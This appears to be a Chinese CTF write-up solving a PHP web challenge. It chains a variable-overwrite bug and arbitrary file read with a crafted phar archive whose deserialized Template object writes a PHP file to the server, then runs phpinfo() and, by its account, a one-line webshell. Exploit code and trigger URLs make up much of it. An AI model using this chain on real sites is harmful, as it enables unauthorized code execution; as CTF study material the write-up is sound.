审计源码发现有变量覆盖漏洞,可以把template覆盖,配合file_get_contents造成任意文件读取

尝试读template.php

1
?var[template][1]=template.php&tp=1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php
class Template{
public $content;
public $pattern;
public $suffix;

public function __construct($content){
$this->content = $content;
$this->pattern = "/{{([a-z]+)}}/";
$this->suffix = ".html";
}

public function __destruct() {
$this->render();
}
public function render() {
while (True) {
if(preg_match($this->pattern, $this->content, $matches)!==1)
break;
global ${$matches[1]};

if(isset(${$matches[1]})) {
$this->content = preg_replace($this->pattern, ${$matches[1]}, $this->content);
}
else{
break;
}
}
if(strlen($this->suffix)>5) {
echo "error suffix";
die();
}
$filename = '/var/www/html/test/uploads/' . md5($_SERVER['REMOTE_ADDR']) . "/" . md5($this->content) . $this->suffix;
file_put_contents($filename, $this->content);
echo "Your html file is in " . $filename;
}
}

?>

很明显可以使用phar反序列化写文件

render()方法中会正则匹配{{}}里内容,然后当作全局变量使用,这样我们可以使用前面的任意变量覆盖对参数进行修改

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
class Template{
public $content;
public $pattern;
public $suffix;

public function __construct($content){
$this->content = $content;
$this->pattern = "/{{([a-z]+)}}/";
$this->suffix = ".php";
}

public function __destruct() {
$this->render();
}
public function render() {
while (True) {
if(preg_match($this->pattern, $this->content, $matches)!==1)
break;
global ${$matches[1]};

if(isset(${$matches[1]})) {
$this->content = preg_replace($this->pattern, ${$matches[1]}, $this->content);
}
else{
break;
}
}
if(strlen($this->suffix)>5) {
echo "error suffix";
die();
}
$filename = '/var/www/html/uploads/' . md5($_SERVER['REMOTE_ADDR']) . "/" . md5($this->content) . $this->suffix;
file_put_contents($filename, $this->content);
echo "Your html file is in " . $filename;
}
}

$phar=new Phar('phar.phar');
$a=new Template();
$a->content="<?php {{abc}} ?>";
$phar->startBuffering();
$phar->addFromString('test.txt','text');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($a);
$phar->stopBuffering();

我们将生成的phar文件上传再调用触发反序列化

image-20201226131349024

1
http://8.129.41.25:10305?var[template][1]=phar:///var/www/html/test/uploads/723ee8e952c6c25ff6277a2f95c77a08/d78ae792e3958c6c8da2e7a8f9de9391.html&tp=1&abc=phpinfo();

image-20201226131314432

我们成功生成了php文件

image-20201226131436427

成功执行命令

我们传入一句话木马成功拿到flag

image-20201226131624759